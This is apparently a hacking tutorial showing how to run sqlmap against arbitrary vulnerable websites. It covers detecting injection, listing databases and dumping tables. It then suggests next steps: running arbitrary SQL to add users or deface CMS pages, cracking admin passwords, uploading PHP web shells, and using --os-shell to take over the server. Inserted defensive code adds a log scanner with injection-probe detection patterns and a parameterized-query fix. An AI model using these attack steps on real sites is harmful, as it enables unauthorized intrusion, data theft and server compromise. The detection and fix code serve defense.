Here is an SQL injection tool for Linux: sqlmap. sqlmap is a Python-based tool, so it runs on any OS that has Python installed, which means it also works on Windows. sqlmap is far more advanced than Havij.
How To Use SqlMap?
(1) Download sqlmap here.
(2) Extract it wherever you want.
(3) Change into the extracted directory. If you extracted it into Downloads, open a terminal and type the following:
cd Downloads
cd sqlmapproject-sqlmap-f305dde
(4) To check whether a URL is vulnerable to SQL injection, type the following command:
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u "vulnerable url of website"
(5) To list the databases of the website, type the following command in the terminal:
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u "vulnerable url of website" --dbs
(6) To list the tables and columns of a database, type the following command:
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u "vulnerable url of website" --tables --columns
(7) To dump the data of a particular database and table, type the following command:
nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u "vulnerable url of website" --dump -D "database_name" -T "table_name"
Now you can view all dumped databases in the following directory:
/home/nirav/Downloads/sqlmapproject-sqlmap-f305dde/output
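The steps above leave a very recognisable trace on the target's web server: sqlmap's default User-Agent identifies itself, and the boolean (AND 1=1 / AND 1=2), UNION and time-based probes it sends in step (4) show up in the query string. The following is an added example, not part of this post and not sqlmap's own code, that parses combined-format access log lines (the log lines below are constructed, not real traffic) and flags requests carrying those indicators, which is how a defender would spot a scan like this after the fact.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access log lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=5 HTTP/1.1" 200 2326 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /news.php?id=5%20AND%201%3D1 HTTP/1.1" 200 2326 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /news.php?id=5%20AND%201%3D2 HTTP/1.1" 200 1104 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /news.php?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 500 512 "-" "Mozilla/5.0 (compatible; MSIE 9.0)"
198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /about.php HTTP/1.1" 200 874 "-" "Mozilla/5.0 (Windows NT 10.0)"
"""

# Fields of the combined log format: client IP, timestamp, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Query-string fragments typical of automated injection probing (boolean, union, time-based).
PAYLOAD_PATTERNS = [
    ("union-select", re.compile(r"\bUNION\b.+\bSELECT\b", re.I)),
    ("boolean-tautology", re.compile(r"\b(AND|OR)\b\s*\(?\s*\d+\s*=\s*\d+", re.I)),
    ("time-based", re.compile(r"\b(SLEEP|BENCHMARK|WAITFOR)\b", re.I)),
    ("comment-terminator", re.compile(r"(--|#|/\*)\s*$")),
]


def parse_line(line):
    """Parse one combined-format line into a dict; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # Decode %20, %3D, '+' etc. so the patterns match what the application actually saw.
    entry["query"] = unquote_plus(parts.query)
    return entry


def indicators(entry):
    """Return the list of indicator names that fire on a parsed entry (empty if benign)."""
    reasons = []
    if entry["ua"].lower().startswith("sqlmap"):
        reasons.append("sqlmap-user-agent")  # sqlmap's default User-Agent, unless the scanner overrode it
    for name, pattern in PAYLOAD_PATTERNS:
        if pattern.search(entry["query"]):
            reasons.append(name)
    return reasons


def scan(log_text):
    """Group flagged requests by client IP: {ip: [(path, decoded_query, reasons), ...]}."""
    hits = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = indicators(entry)
        if reasons:
            hits.setdefault(entry["ip"], []).append((entry["path"], entry["query"], reasons))
    return hits


if __name__ == "__main__":
    for ip, requests in scan(SAMPLE_LOG).items():
        print(f"{ip}: {len(requests)} suspicious request(s)")
        for path, query, reasons in requests:
            print(f"  {path}?{query}  <- {', '.join(reasons)}")
```

The User-Agent check alone is not enough, since sqlmap's `--random-agent` option replaces it; the fourth sample line shows a UNION probe that is caught only by the payload patterns. In practice the decoded query string is what the WAF or log pipeline should inspect, because the raw log line still carries the percent-encoding.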
What can you do next?
1-Execute arbitrary SQL commands on the server
This is probably the easiest thing to do on a server that is vulnerable to SQL injection. The --sql-query parameter can be used to specify a SQL query to execute. Things of interest would be creating a user in the users table or something similar, or changing the content of CMS pages.
Another parameter, --sql-shell, gives an SQL-shell-like interface for running queries interactively.
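Everything sqlmap does above, from the AND 1=1 / AND 1=2 probe in step (4) to running arbitrary statements with --sql-query, depends on the application pasting the URL parameter straight into its SQL text. The following is an added example, not from this post, using Python's built-in sqlite3 module and a constructed `news` table: the vulnerable lookup is shown beside the parameterized one, and the same inputs are run through both to show that the bound-parameter version neither answers the boolean probe nor lets the `published = 1` filter be bypassed.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for a CMS 'news' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)", [
        (1, "Public post", 1),
        (2, "Another public post", 1),
        (3, "Unpublished draft", 0),
    ])
    return conn


def lookup_vulnerable(conn, news_id):
    """The injectable pattern: the request parameter is concatenated into the SQL text.

    '1 AND 1=1' and '1 AND 1=2' return different results (the boolean probe sqlmap uses),
    and '3 OR 1=1' turns the WHERE clause into '(published = 1 AND id = 3) OR 1=1',
    which leaks the unpublished row.
    """
    sql = "SELECT title FROM news WHERE published = 1 AND id = " + news_id + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, news_id):
    """The fix: a bound parameter is sent as a value and is never parsed as SQL.

    Whatever the string contains, it is compared against the id column as data,
    so an injected 'AND'/'OR' clause simply matches nothing.
    """
    sql = "SELECT title FROM news WHERE published = 1 AND id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (news_id,))]


if __name__ == "__main__":
    conn = make_db()
    for probe in ("1", "1 AND 1=1", "1 AND 1=2", "3 OR 1=1"):
        print(f"{probe!r:14} vulnerable -> {lookup_vulnerable(conn, probe)}")
        print(f"{probe!r:14} safe       -> {lookup_safe(conn, probe)}")
```

Note that `lookup_safe` accepts the input as a plain string and relies on the database to treat it as a value; in a real handler you would also reject anything that is not an integer before it reaches the query, which turns the probe into a 4xx response instead of a silent empty result.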
2-Get inside the admin panel and play
If the website is running some kind of custom CMS or something similar that has an admin panel, then it might be possible to get inside, provided you are able to crack the password retrieved in the database dump. Simple, short passwords can be broken by brute force; long, complex passwords may not be breakable.
Check whether the admin panel allows file uploads. If an arbitrary PHP file can be uploaded, it gets a lot more fun: the PHP file can contain shell_exec, system, exec or passthru calls, which allow arbitrary system commands to be executed. PHP web shell scripts can be uploaded to do the same thing.
3-Shell on remote OS
This is the thing to do to completely take over the server. Note, however, that it is not as easy and trivial as the tricks shown above. sqlmap comes with a parameter called --os-shell that can be used to try to get a shell on the remote system, but it has many limitations of its own.